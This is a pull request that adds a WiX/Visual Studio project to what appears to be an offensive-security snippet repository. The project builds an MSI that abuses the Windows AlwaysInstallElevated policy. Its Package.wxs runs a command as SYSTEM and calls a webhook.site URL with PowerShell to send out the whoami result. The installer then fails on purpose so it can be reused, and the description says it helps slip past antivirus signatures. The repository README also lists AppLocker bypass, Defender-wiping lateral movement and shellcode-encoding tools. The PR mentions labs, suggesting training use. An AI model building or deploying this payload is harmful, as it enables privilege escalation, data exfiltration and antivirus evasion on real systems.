### PR TITLE
AlwaysInstallElevated payload

### DIFF
--- a/AlwaysInstallElevated MSI/Folders.wxs
+++ b/AlwaysInstallElevated MSI/Folders.wxs
@@ -1,0 +1,7 @@
+<Wix xmlns="http://wixtoolset.org/schemas/v4/wxs">
+  <Fragment>
+    <StandardDirectory Id="ProgramFiles6432Folder">
+      <Directory Id="INSTALLFOLDER" Name="!(bind.Property.Manufacturer) !(bind.Property.ProductName)" />
+    </StandardDirectory>
+  </Fragment>
+</Wix>

--- a/AlwaysInstallElevated MSI/InstallComponents.wxs
+++ b/AlwaysInstallElevated MSI/InstallComponents.wxs
@@ -1,0 +1,9 @@
+<Wix xmlns="http://wixtoolset.org/schemas/v4/wxs">
+  <Fragment>
+    <ComponentGroup Id="InstallComponents" Directory="INSTALLFOLDER">
+      <Component>
+        <File Source="InstallComponents.wxs" />
+      </Component>
+    </ComponentGroup>
+  </Fragment>
+</Wix>

--- a/AlwaysInstallElevated MSI/InstallMe.sln
+++ b/AlwaysInstallElevated MSI/InstallMe.sln
@@ -1,0 +1,37 @@
+﻿
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 17
+VisualStudioVersion = 17.5.33627.172
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{B7DD6F7E-DEF8-4E67-B5B7-07EF123DB6F0}") = "InstallMe", "InstallMe.wixproj", "{09166350-27A5-42A5-B178-8CDFA6547323}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|ARM64 = Debug|ARM64
+		Debug|x64 = Debug|x64
+		Debug|x86 = Debug|x86
+		Release|ARM64 = Release|ARM64
+		Release|x64 = Release|x64
+		Release|x86 = Release|x86
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{09166350-27A5-42A5-B178-8CDFA6547323}.Debug|ARM64.ActiveCfg = Debug|ARM64
+		{09166350-27A5-42A5-B178-8CDFA6547323}.Debug|ARM64.Build.0 = Debug|ARM64
+		{09166350-27A5-42A5-B178-8CDFA6547323}.Debug|x64.ActiveCfg = Debug|x64
+		{09166350-27A5-42A5-B178-8CDFA6547323}.Debug|x64.Build.0 = Debug|x64
+		{09166350-27A5-42A5-B178-8CDFA6547323}.Debug|x86.ActiveCfg = Debug|x86
+		{09166350-27A5-42A5-B178-8CDFA6547323}.Debug|x86.Build.0 = Debug|x86
+		{09166350-27A5-42A5-B178-8CDFA6547323}.Release|ARM64.ActiveCfg = Release|ARM64
+		{09166350-27A5-42A5-B178-8CDFA6547323}.Release|ARM64.Build.0 = Release|ARM64
+		{09166350-27A5-42A5-B178-8CDFA6547323}.Release|x64.ActiveCfg = Release|x64
+		{09166350-27A5-42A5-B178-8CDFA6547323}.Release|x64.Build.0 = Release|x64
+		{09166350-27A5-42A5-B178-8CDFA6547323}.Release|x86.ActiveCfg = Release|x86
+		{09166350-27A5-42A5-B178-8CDFA6547323}.Release|x86.Build.0 = Release|x86
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {3096FD1B-7BF5-4A24-8861-1B024DE1E3C2}
+	EndGlobalSection
+EndGlobal

--- a/AlwaysInstallElevated MSI/InstallMe.wixproj
+++ b/AlwaysInstallElevated MSI/InstallMe.wixproj
@@ -1,0 +1,2 @@
+﻿<Project Sdk="WixToolset.Sdk/4.0.0">
+</Project>

--- a/AlwaysInstallElevated MSI/Package.en-us.wxl
+++ b/AlwaysInstallElevated MSI/Package.en-us.wxl
@@ -1,0 +1,8 @@
+﻿<!--
+This file contains the declaration of all the localizable strings.
+-->
+<WixLocalization xmlns="http://wixtoolset.org/schemas/v4/wxl" Culture="en-US">
+
+  <String Id="DowngradeError" Value="A newer version of InstallMe is already installed." />
+
+</WixLocalization>

--- a/AlwaysInstallElevated MSI/Package.wxs
+++ b/AlwaysInstallElevated MSI/Package.wxs
@@ -1,0 +1,20 @@
+﻿<Wix xmlns="http://wixtoolset.org/schemas/v4/wxs">
+  <Package Name="InstallMe" Manufacturer="InstallMe Limited" Version="1.0.0.0" UpgradeCode="25f80f0d-6dad-4570-9e4e-b0276ee51efa" Scope="perMachine">
+    <MajorUpgrade DowngradeErrorMessage="!(loc.DowngradeError)" />
+    <MediaTemplate EmbedCab="yes"/>
+
+    <!-- Add any command to execute here -->
+    <CustomAction Id="RunMe" Impersonate="no" Execute="deferred" Directory="System64Folder" ExeCommand='cmd.exe /c &quot;powershell.exe irm https://webhook.site/a0efc249-9604-4752-858b-58dbb7b7b633/$$(whoami)&quot;' Return="check" />
+    <!-- Leave this as "blahblah" or anything else that does not exist. It should intentionally fail after running above command. -->
+    <CustomAction Id="AllwaysFail" Impersonate="no" Execute="deferred" Directory="INSTALLFOLDER" ExeCommand="blahblah" Return="check" />
+
+    <InstallExecuteSequence>
+      <Custom Action="RunMe" Before="InstallFiles"/>
+      <Custom Action="AllwaysFail" After="RunMe"/>
+    </InstallExecuteSequence>
+
+    <Feature Id="Main">
+      <ComponentGroupRef Id="InstallComponents" />
+    </Feature>
+  </Package>
+</Wix>

--- a/AlwaysInstallElevated MSI/README.md
+++ b/AlwaysInstallElevated MSI/README.md
@@ -1,0 +1,6 @@
+Create an Installer MSI package that executes an arbitrary command to exploit an `AlwaysInstallElevated` policy.
+
+Instructions:
+* May require [HeatWave](https://www.firegiant.com/docs/heatwave/) to build in Visual Studio.
+* Change the "RunMe" custom action of Package.wxs with your custom command.
+* The installer intentionally fails after executing the command. This allows it to be used again without needing an uninstall/upgrade.

--- a/README.md
+++ b/README.md
@@ -12,6 +12,7 @@ $assem = [System.Reflection.Assembly]::Load($data)
 ### Contents
 |Snippet Name|Description|
 |--|--|
+| AlwaysInstallElevated MSI | Boilerplate VS solution for an MSI that runs an arbitrary command and then fails intentionally, for use with the `AlwaysInstallElevated` setting. Thanks [@carlmon](https://github.com/carlmon) for contributing! |
 | AppLocker Bypass PowerShell Runspace (C#) | Base binary for an applocker bypass using a combination of `CertUtil`, `BitsAdmin`, and `InstallUtil`. See `README.md` for details.|
 | Fileless Lateral Movement (C#) | Wipes Windows Defender signatures on the remote host and uses a PSExec-like method (except using an existing process) to achieve lateral movement. Takes arguments for the target, the target service, and the target binary to run. Note that a non-critical service should be chosen, such as `SensorService`. |
 |Linux Shellcode Encoder (Python) | Utility scripts to encode C# payloads from Linux, either ingesting a raw shellcode payload (.bin), or automatically feeding from 'msfvenom'. Supports XOR and ROT encoding with an arbitrary key, and prints the decoding function. Can be used to replace the C# ROT/XOR encoder scripts.|


### PR DESCRIPTION
Useful code to build custom MSI packages that are not signatured by AV. One of the new labs requires exploiting AlwaysInstallElevated.